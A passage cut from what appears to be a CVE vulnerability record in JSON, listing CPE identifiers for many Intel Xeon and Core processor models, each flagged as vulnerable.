                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4607:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2407:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2440:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2470:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2665:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4807:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2870:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4870_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4860_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2850_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_bronze_3106:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4110:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4109t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6146:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6144:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6136:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6128:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5118:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5115:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8180:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8164:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7290f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7290:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7285:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7295:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8600k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7y75:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6402p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6350hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6300hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6320:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m5:6y57:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m3:6y30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5775c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5650u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2448l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4870:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4860:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2830:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2820:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880l_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2890_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4116:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4114t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6152:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6150:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6140m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6140:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6132:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5122:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5120t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8170m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8158:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7230f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7230:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8700:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8700k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7920hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7660u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7600u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7567u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6585r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6440eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6440hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6267u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6287u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6102e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6157u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m3:7y32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m3:7y30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5750hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5700eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5550u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5500u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5287u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5257u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y71:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y70:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4910mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4950hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4870hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4710mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4712hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5575r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5350u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5157u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5020u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5015u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4800mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4810mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4722hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4750hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4600m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4600u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4558u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4578u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4302y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4220y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4340:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4370t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4120u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4158u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4130:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4000m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4030u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4030y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8837:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8830:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2860:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880l_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_bronze_3104:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4116t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4108:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6154:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
